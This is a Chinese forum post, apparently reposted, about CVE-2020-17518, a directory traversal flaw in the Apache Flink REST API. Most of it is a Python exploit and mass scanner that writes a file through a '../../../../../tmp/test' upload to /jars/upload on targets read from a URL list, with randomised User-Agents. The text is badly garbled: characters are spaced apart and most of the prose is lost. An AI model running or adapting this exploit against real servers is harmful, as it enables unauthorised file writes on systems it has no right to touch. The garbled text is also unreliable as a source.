搜索

[28720] 2021-01-09_ApacheFlink目录遍历漏洞,可通过RESTAPI读写远程文件

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-01-09_ApacheFlink目录遍历漏洞,可通过RESTAPI读写远程文件 A p a c h e   F l i n k R E S T   A P I / Q m F 0 c 3 U K   O t s   2 0 2 1 - 0 1 - 0 9 A p a c h e   F l i n k R E S T   A P I / C V E - 2 0 2 0 - 1 7 5 1 8 C V E - 2 0 2 0 - 1 7 5 1 8 R E S T   A P I F l i n k   1 . 5 . 1 - 1 . 1 1 . 2 F l i n k   1 . 1 1 . 3 F l i n k   1 . 1 2 . 0 F l i n k   1 . 5 . 1 R E S T   A P I H T T P   H E A D E R p y t h o n   C V E - 2 0 2 0 - 1 7 5 1 8 . p y   - u   h t t p / /   I P p o r t p y t h o n   C V E - 2 0 2 0 - 1 7 5 1 8 . p y   - f   u r l . t x t # - * -   c o d i n g : u t f - 8   - * - b a n n e r   =   " " "                 8 8 8 8 8 8 b a                           d P                                                           8 8         ` 8 b                         8 8                                                         a 8 8 a a a a 8 P '   . d 8 8 8 8 b .   d 8 8 8 8 P   . d 8 8 8 8 b .   d P         d P                   8 8       ` 8 b .   8 8 '     ` 8 8       8 8       Y 8 o o o o o .   8 8         8 8                   8 8         . 8 8   8 8 .     . 8 8       8 8                   8 8   8 8 .     . 8 8                   8 8 8 8 8 8 8 8 P   ` 8 8 8 8 8 P 8       d P       ` 8 8 8 8 8 P '   ` 8 8 8 8 8 P '         o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o                                   @ t i m e : 2 0 2 1 / 0 1 / 0 6   C V E - 2 0 2 0 - 1 7 5 1 8 . p y                                 C 0 d e   b y   N e b u l a b d S e c   -   @ b a t s u                                       " " " p r i n t ( b a n n e r ) i m p o r t   t h r e a d p o o l i m p o r t   r a n d o m i m p o r t   r e q u e s t s i m p o r t   a r g p a r s e i m p o r t   h t t p . c l i e n t i m p o r t   u r l l i b 3 u r l l i b 3 . d i s a b l e _ w a r n i n g s ( u r l l i b 3 . e x c e p t i o n s . I n s e c u r e R e q u e s t W a r n i n g ) h t t p . c l i e n t . H T T P C o n n e c t i o n . _ h t t p _ v s n   =   1 0
h t t p . c l i e n t . H T T P C o n n e c t i o n . _ h t t p _ v s n   =   1 0 h t t p . c l i e n t . H T T P C o n n e c t i o n . _ h t t p _ v s n _ s t r   =   ' H T T P / 1 . 0 ' p a y l o a d _ C M D     =   ' ' ' t e s t ' ' ' T A R G E T _ U R I   =   " / j a r s / u p l o a d ' % 2 b s s s " d e f   g e t _ u a ( ) :         f i r s t _ n u m   =   r a n d o m . r a n d i n t ( 5 5 ,   6 2 )         t h i r d _ n u m   =   r a n d o m . r a n d i n t ( 0 ,   3 2 0 0 )         f o u r t h _ n u m   =   r a n d o m . r a n d i n t ( 0 ,   1 4 0 )         o s _ t y p e   =   [                 ' ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 ) ' ,   ' ( W i n d o w s   N T   1 0 . 0 ;   W O W 6 4 ) ' ,   ' ( X 1 1 ;   L i n u x   x 8 6 _ 6 4 ) ' ,                 ' ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 2 _ 6 ) '         ]         c h r o m e _ v e r s i o n   =   ' C h r o m e / { } . 0 . { } . { } ' . f o r m a t ( f i r s t _ n u m ,   t h i r d _ n u m ,   f o u r t h _ n u m )         u a   =   '   ' . j o i n ( [ ' M o z i l l a / 5 . 0 ' ,   r a n d o m . c h o i c e ( o s _ t y p e ) ,   ' A p p l e W e b K i t / 5 3 7 . 3 6 ' ,                                       ' ( K H T M L ,   l i k e   G e c k o ) ' ,   c h r o m e _ v e r s i o n ,   ' S a f a r i / 5 3 7 . 3 6 ' ]                                     )         r e t u r n   u a d e f   C V E _ 2 0 2 0 _ 1 7 5 1 8 ( u r l ) :         p r o x i e s   =   { " h t t p " : " h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0 " }         #   p r o x i e s   =   { " s c o k s 5 " :   " h t t p : / / 1 2 7 . 0 . 0 . 1 : 1 0 8 1 " }         p a r a m s M u l t i p a r t   =   [ ( ' j a r f i l e ' ,                                                 ( ' . . / . . / . . / . . / . . / t m p / t e s t ' ,   " { } r n " . f o r m a t ( p a y l o a d _ C M D ) ,   ' a p p l i c a t i o n / o c t e t - s t r e a m ' ) ) ]         h e a d e r s   =   {                 ' U s e r - A g e n t ' :   g e t _ u a ( ) ,                 " A c c e p t " :   " * / * "         }         t a r g e t U r l   =   u r l   +   T A R G E T _ U R I         t r y :                 r e s   =   r e q u e s t s . p o s t ( t a r g e t U r l ,                                                         f i l e s = p a r a m s M u l t i p a r t ,                                                         h e a d e r s = h e a d e r s ,                                                         t i m e o u t = 1 5 ,                                                         v e r i f y = F a l s e ,                                                         p r o x i e s = p r o x i e s )                                                         #   p r o x i e s = { ' s o c k s 5 ' :   ' h t t p : / / 1 2 7 . 0 . 0 . 1 : 1 0 8 1 ' } )                 i f     l e n ( r e s . t e x t )   = =   2 5   a n d   " N o t   f o u n d "   i n   r e s . t e x t   a n d   " e r r o r s "   i n   r e s . t e x t :                         p r i n t ( " [ + ]   U R L : { } - - - - - - - - C V E - 2 0 2 0 - 1 7 5 1 8 " . f o r m a t ( u r l ) )                         w i t h   o p e n ( " . t x t " ,   ' a ' )   a s   f w :                                 f w . w r i t e ( u r l   +   ' n ' )                 e l s e :                         p r i n t ( " [ - ]   "   +   u r l   +   "   C V E - 2 0 2 0 - 1 7 5 1 8 . n " )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t ( e )         e x c e p t :                 p r i n t ( " [ - ]   "   +   u r l   +   "   R e q u e s t   E R R O R . n " ) d e f   m u l t i t h r e a d i n g ( f i l e n a m e = " i p . t x t " ,   p o o l s = 5 ) :         w o r k s   =   [ ]
        w i t h   o p e n ( f i l e n a m e ,   " r " )   a s   f :                 f o r   i   i n   f :                         f u n c _ p a r a m s   =   [ i . r s t r i p ( " n " ) ]                         w o r k s . a p p e n d ( ( f u n c _ p a r a m s ,   N o n e ) )         p o o l   =   t h r e a d p o o l . T h r e a d P o o l ( p o o l s )         r e q s   =   t h r e a d p o o l . m a k e R e q u e s t s ( C V E _ 2 0 2 0 _ 1 7 5 1 8 ,   w o r k s )         [ p o o l . p u t R e q u e s t ( r e q )   f o r   r e q   i n   r e q s ]         p o o l . w a i t ( ) d e f   m a i n ( ) :         p r i n t ( " . . / . . / . . / . . / . . / t m p / t e s t , ' ' ' t e s t ' ' ' " )         p a r s e r   =   a r g p a r s e . A r g u m e n t P a r s e r ( )         p a r s e r . a d d _ a r g u m e n t ( " - u " ,                                                 " - - u r l " ,                                                 h e l p = " T a r g e t   U R L ;   E x a m p l e : h t t p : / / i p : p o r t " )         p a r s e r . a d d _ a r g u m e n t ( " - f " ,                                                 " - - f i l e " ,                                                 h e l p = " U r l   F i l e ;   E x a m p l e : u r l . t x t " )         a r g s   =   p a r s e r . p a r s e _ a r g s ( )         u r l   =   a r g s . u r l         f i l e _ p a t h   =   a r g s . f i l e         i f   u r l   ! =   N o n e   a n d   f i l e _ p a t h   = = N o n e :                 C V E _ 2 0 2 0 _ 1 7 5 1 8 ( u r l )         e l i f   u r l   = =   N o n e   a n d   f i l e _ p a t h   ! =   N o n e :                 m u l t i t h r e a d i n g ( f i l e _ p a t h ,   1 0 )     #   1 5 线 i f   _ _ n a m e _ _   = =   " _ _ m a i n _ _ " :         m a i n ( ) h t t p s : / / g i t h u b . c o m / Q m F 0 c 3 U K / C V E - 2 0 2 0 - 1 7 5 1 8

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理